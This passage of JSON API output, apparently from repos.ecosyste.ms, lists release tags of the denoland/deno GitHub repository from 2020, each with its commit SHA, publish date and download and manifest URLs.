/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https:/